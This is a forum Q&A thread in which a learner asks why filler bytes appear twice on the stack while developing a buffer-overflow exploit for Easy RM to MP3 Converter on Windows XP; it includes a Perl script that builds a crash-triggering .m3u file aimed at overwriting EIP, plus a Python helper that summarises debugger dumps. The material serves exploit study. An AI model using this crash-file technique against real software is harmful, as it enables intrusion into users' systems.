Reputation: 11
Some time back, while working on an exploit for Easy RM to MP3 Converter 2.7.3.700 on Windows XP SP3 ( http://www.exploit-db.com/exploits/9177/ ), I came across a concept which I am not understanding. It goes like this:
Perl script for generating the malicious file:
use strict;
use warnings;
my $junk   = "\x41" x 25000;   # 25000 'A' bytes
my $offset = "\x42" x 1072;    # 1072 'B' bytes
my $eip    = "\x43" x 4;       # 4 'C' bytes intended to land in EIP
my $adjustment = "";           # was undefined in the original script; empty so the file is junk.offset.eip
my $file = "crash.m3u";
open (my $fh, ">", $file) or die "cannot open $file: $!";   # lexical filehandle instead of reusing $file
print $fh $junk.$offset.$eip.$adjustment;
close ($fh);
After generating the malicious file, feed it into the converter and then analyze the contents of the stack at [esp+18] (addressing relative to esp)... why are these A's here??
I mean:
A's start from [ESP-88E8] to [ESP-43C]
B's start from [ESP-438] to [ESP-C]
C's at [ESP-8]
Then why are these A's again at [ESP+18] to [ESP+418]? Why are these A's repeating at [ESP+18] to [ESP+418] when they have already been placed from [ESP-88E8] to [ESP-43C]?
Thank you.
Upvotes: 0
Views: 371
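The observation in the question (the same fill byte showing up in two separate regions, one below ESP and one above it) is easiest to reason about if the debugger dump is summarised as ESP-relative runs instead of read row by row. The following is an added analysis example, not code from the question or from the exploit-db entry: it parses a constructed debugger-style memory dump (address followed by 16 hex bytes per row, with a made-up ESP value), finds every run of identical non-zero bytes, and reports each run's start and end relative to ESP. Two separate 'A' runs in the output, one on each side of ESP, is exactly the situation the question describes, and it is what you would expect if the input buffer had been copied more than once on the stack.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed debugger-style dump (not from the page): address, then 16 hex bytes per row.
# The layout mimics the question: a run of 'A's, then 'B's, then 'C's just below ESP,
# and a second, separate copy of 'A's above ESP.
DUMP = """\
0012F000  00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
0012F010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
0012F020  41 41 41 41 41 41 41 41 42 42 42 42 42 42 42 42
0012F030  42 42 42 42 42 42 42 42 43 43 43 43 00 00 00 00
0012F040  11 22 33 44 41 41 41 41 41 41 41 41 41 41 41 41
0012F050  41 41 41 41 41 41 41 41 41 41 41 41 00 00 00 00
"""
ESP = 0x0012F040  # constructed value of ESP at the crash (assumption, not from the page)


def parse_dump(text: str) -> Tuple[int, bytes]:
    """Parse 'ADDRESS  b0 b1 ... bF' rows into (base_address, bytes). Rows must be contiguous."""
    base = None
    expected = None
    out = bytearray()
    for line in text.splitlines():
        if not line.strip():
            continue
        addr_str, *hexbytes = line.split()
        addr = int(addr_str, 16)
        if base is None:
            base = addr
        elif addr != expected:
            raise ValueError(f"non-contiguous row at {addr:08X}")
        out += bytes(int(h, 16) for h in hexbytes)
        expected = addr + len(hexbytes)
    return base, bytes(out)


@dataclass
class Run:
    byte: int
    start: int   # offset from ESP of the first byte (negative = below ESP)
    end: int     # offset from ESP of the last byte (inclusive)
    length: int


def find_runs(data: bytes, base: int, esp: int, min_len: int = 4) -> List[Run]:
    """Report every run of at least min_len identical non-zero bytes, ESP-relative."""
    runs = []
    i, n = 0, len(data)
    while i < n:
        j = i
        while j < n and data[j] == data[i]:
            j += 1
        if j - i >= min_len and data[i] != 0:
            runs.append(Run(data[i], base + i - esp, base + j - 1 - esp, j - i))
        i = j
    return runs


def esp_rel(off: int) -> str:
    """Format an offset the way the question writes it, e.g. [ESP-8] or [ESP+18]."""
    return f"[ESP{'+' if off >= 0 else '-'}{abs(off):X}]"


def report(runs: List[Run]) -> List[str]:
    return [f"{chr(r.byte)}'s from {esp_rel(r.start)} to {esp_rel(r.end)} ({r.length} bytes)"
            for r in runs]


if __name__ == "__main__":
    base, data = parse_dump(DUMP)
    for line in report(find_runs(data, base, ESP)):
        print(line)
```

Running it on the constructed dump lists the 'A' run below ESP, then the 'B' and 'C' runs, and then a second 'A' run starting at [ESP+4]. On a real dump, pasting the debugger's memory window into DUMP and setting ESP to the value shown at the crash gives the same ESP-relative summary, which is what you need before deciding which copy of the buffer the crash actually came from.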
Reputation: 119
Those are there for filling the buffer with junk, and the rest 1700+ bytes are generated using Metasploit to get the address when EIP is overwritten. So, you need to determine how many bytes you will need to cause the buffer overflow, as they differ from OS to OS and so on.
OPTIONAL: So, do that and you will have set the breakpoint where it is required and get the EIP address.
Upvotes: 2
Reputation: 2825
So, to answer your question, you have to do a little bit more debugging on the Easy RM to MP3 Converter; try setting some earlier breakpoints. I suspect the overflow doesn't occur immediately and is probably copied a few times before it overwrites a static buffer. :)
Upvotes: 0